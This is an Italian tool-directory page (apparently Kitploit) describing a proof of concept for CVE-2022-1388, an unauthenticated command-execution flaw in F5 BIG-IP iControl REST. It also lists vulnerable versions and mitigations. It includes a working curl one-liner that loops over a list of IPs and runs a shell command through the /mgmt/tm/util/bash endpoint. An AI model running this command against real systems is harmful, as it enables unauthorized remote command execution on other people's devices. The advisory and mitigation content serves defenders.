Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-1388 — Vulnerabilità dell'iControl REST di BIG-IP CVE-2022-1388 PoC | Kitploit
Strumenti/GitHubGitHub/shamo0/cve-2022-1388
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlRed Teaming
GitHubshamo0/cve-2022-1388

CVE-2022-1388

Vulnerabilità dell'iControl REST di BIG-IP CVE-2022-1388 PoC

Vedi Repository
1684 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Vulnerabilità BIG-IP iControl REST CVE-2022-1388 PoC

f5logo

Questa vulnerabilità potrebbe consentire a un attaccante non autenticato con accesso di rete al sistema BIG-IP tramite la porta di gestione e/o gli indirizzi self IP di eseguire comandi di sistema arbitrari, creare o eliminare file o disabilitare servizi

PoC

Puoi usare il seguente comando curl one-liner per verificare la vulnerabilità F5 Big-IP oppure usare lo script Python fornito.

cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done

Versioni vulnerabili (Big-IP)

BranchVersioni vulnerabiliCorrezioni introdotte
11.x11.6.1-11.6.5Nessuna correzione
12.x12.1.0-12.1.6Nessuna correzione
13.x13.1.0-13.1.413.1.5
14.x14.1.0-14.1.414.1.4.6
15.x15.1.0-15.1.515.1.5.1
16.x16.1.0-16.1.216.1.2.2
17.xNessuna17.0.0

Mitigazione

  • Esegui l'upgrade alla versione corretta indicata nella colonna ```Correzioni introdotte```. (Metodo preferito)
  • Blocca l'accesso a iControl REST attraverso l'indirizzo self IP
  • Blocca l'accesso a iControl REST attraverso l'interfaccia di gestione
  • Modifica la configurazione httpd di BIG-IP

Per maggiori informazioni sulla mitigazione, consulta i riferimenti.

Riferimenti

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
  • https://support.f5.com/csp/article/K23605346
  • https://github.com/ZephrFish/F5-CVE-2022-1388-Exploit
Scarica lo strumento